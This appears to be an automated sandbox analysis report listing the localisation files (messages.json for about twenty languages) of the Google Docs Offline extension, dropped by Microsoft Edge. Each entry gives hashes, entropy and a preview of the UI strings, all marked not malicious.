SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
